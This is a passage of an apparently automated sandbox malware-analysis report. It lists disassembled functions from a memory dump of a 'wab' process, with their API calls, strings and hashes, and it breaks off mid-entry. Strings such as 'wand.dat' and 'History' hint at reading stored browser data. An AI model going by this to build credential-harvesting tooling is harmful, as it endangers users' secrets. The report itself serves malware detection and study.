                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                  • memset.MSVCRT ref: 004450CD
                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                    • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                    • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                                    • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                                    • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                                  • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                  • String ID:
                                                  • API String ID: 1471605966-0
                                                  • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                  • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                  • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                  • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • wcscpy.MSVCRT ref: 0044475F
                                                  • wcscat.MSVCRT ref: 0044476E
                                                  • wcscat.MSVCRT ref: 0044477F
                                                  • wcscat.MSVCRT ref: 0044478E
                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                    • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                    • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                    • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                  • String ID: \StringFileInfo\
                                                  • API String ID: 102104167-2245444037
                                                  • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                  • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                  • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                  • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  • API String ID: 613200358-0
                                                  • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                  • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                  • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                  • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$??3@
                                                  • String ID: g4@
                                                  • API String ID: 3314356048-2133833424
                                                  • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                  • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                  • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                  • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _memicmpwcslen
                                                  • String ID: @@@@$History
                                                  • API String ID: 1872909662-685208920
                                                  • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                  • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                  • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                  • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 004100FB
                                                  • memset.MSVCRT ref: 00410112
                                                    • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                    • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                  • _snwprintf.MSVCRT ref: 00410141
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$_snwprintf_wcslwrwcscpy
                                                  • String ID: </%s>
                                                  • API String ID: 3400436232-259020660
                                                  • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                  • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                  • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                  • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 0040D58D
                                                  • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                  • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ChildEnumTextWindowWindowsmemset
                                                  • String ID: caption
                                                  • API String ID: 1523050162-4135340389
                                                  • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                  • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                  • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                  • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                    • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                  • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                  • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                  • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                  • String ID: MS Sans Serif
                                                  • API String ID: 210187428-168460110
                                                  • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                  • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                  • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                  • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ClassName_wcsicmpmemset
                                                  • String ID: edit
                                                  • API String ID: 2747424523-2167791130
                                                  • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                  • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                  • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                  • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                  • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                  • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                  • String ID: SHAutoComplete$shlwapi.dll
                                                  • API String ID: 3150196962-1506664499
                                                  • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                  • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                  • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                  • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$memcmp
                                                  • String ID:
                                                  • API String ID: 3384217055-0
                                                  • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                  • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                  • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                  • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$memcpy
                                                  • String ID:
                                                  • API String ID: 368790112-0
                                                  • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                  • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                  • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                  • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                    • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                    • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                    • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                    • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                  • GetMenu.USER32(?), ref: 00410F8D
                                                  • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                  • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                  • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                  • String ID:
                                                  • API String ID: 1889144086-0
                                                  • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                  • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                  • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                  • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                  • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                  • GetLastError.KERNEL32 ref: 0041810A
                                                  • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$CloseCreateErrorHandleLastMappingView
                                                  • String ID:
                                                  • API String ID: 1661045500-0
                                                  • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                  • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                  • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                  • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                  • memcpy.MSVCRT ref: 0042EC7A
                                                  Strings
                                                  • Cannot add a column to a view, xrefs: 0042EBE8
                                                  • sqlite_altertab_%s, xrefs: 0042EC4C
                                                  • virtual tables may not be altered, xrefs: 0042EBD2
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpymemset
                                                  • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                  • API String ID: 1297977491-2063813899
                                                  • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                  • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                  • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                  • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 0040560C
                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                    • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                    • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                    • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                    • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                  • String ID: *.*$dat$wand.dat
                                                  • API String ID: 2618321458-1828844352
                                                  • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                  • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                  • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                  • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                    • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                  • wcslen.MSVCRT ref: 00410C74
                                                  • _wtoi.MSVCRT ref: 00410C80
                                                  • _wcsicmp.MSVCRT ref: 00410CCE
                                                  • _wcsicmp.MSVCRT ref: 00410CDF
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                  • String ID:
                                                  • API String ID: 1549203181-0
                                                  • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                  • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                  • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                  • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 00412057
                                                    • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                  • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                  • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                  • GetKeyState.USER32(00000010), ref: 0041210D
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                  • String ID:
                                                  • API String ID: 3550944819-0
                                                  • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                  • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                  • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                  • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • wcslen.MSVCRT ref: 0040A8E2
                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                    • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                    • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                  • memcpy.MSVCRT ref: 0040A94F
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@$memcpy$mallocwcslen
                                                  • String ID:
                                                  • API String ID: 3023356884-0
                                                  • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                  • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                  • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                  • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • wcslen.MSVCRT ref: 0040B1DE
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                    • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                    • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                                  • memcpy.MSVCRT ref: 0040B248
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@$memcpy$mallocwcslen
                                                  • String ID:
                                                  • API String ID: 3023356884-0
                                                  • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                  • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                  • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                  • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID: @
                                                  • API String ID: 3510742995-2766056989
                                                  • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                  • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                  • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                  • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@??3@memcpymemset
                                                  • String ID:
                                                  • API String ID: 1865533344-0
                                                  • Opcode ID: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                  • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                  • Opcode Fuzzy Hash: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                  • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • strlen.MSVCRT ref: 0040B0D8
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                    • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                    • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                                  • memcpy.MSVCRT ref: 0040B159
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@$memcpy$mallocstrlen
                                                  • String ID:
                                                  • API String ID: 1171893557-0
                                                  • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                  • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                  • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
